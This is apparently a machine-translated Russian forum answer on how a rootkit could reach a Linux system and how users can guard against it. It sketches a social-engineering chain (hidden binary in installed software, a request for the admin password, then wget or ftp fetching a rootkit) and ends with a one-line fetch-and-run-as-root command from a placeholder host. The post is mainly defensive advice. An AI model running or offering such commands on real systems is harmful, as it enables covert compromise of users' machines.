Если бы это был я, я бы использовал следующий метод:
- Попросите пользователя загрузить и установить часть программного обеспечения (# 1). Пусть это программное обеспечение установит необходимое программное обеспечение. Скрытие двоичного объекта внутри этого приложения позволяет загружать программное обеспечение (т. Е. Инструмент, который вы можете использовать для ftp, wget и т. Д.).
- Запрашивайте учетную запись администратора (# 2) и используйте ее для использования экземпляра ftp, wget для загрузки и установки руткита.
Относительно # 1: пользователь никогда не должен загружать случайное программное обеспечение при использовании Linux; используйте соответствующие каналы (Ubuntu Software Center) для установки программного обеспечения. Если это программное обеспечение необходимо загружать за пределы соответствующих каналов, убедитесь, что источнику загрузки можно доверять. Вспомните последние версии программного обеспечения Apache или MySQL. Не стоит загружать случайное программное обеспечение, не проверяя различные социальные сети на предмет целостности этого приложения. Microsoft никогда не централизовала программное обеспечение; это привело к тому, что многие люди занимались программным обеспечением, поэтому их пользовательская база огромна, но это также позволило легко войти в компьютеры и начать собирать данные, которые они могут продать.
Относительно № 2: роковая ошибка пользователя. Никогда и никогда не вводите свой пароль администратора, если вы не знаете, почему его спрашивают.
wget http://mydomain/script.sh;sudo ./script.sh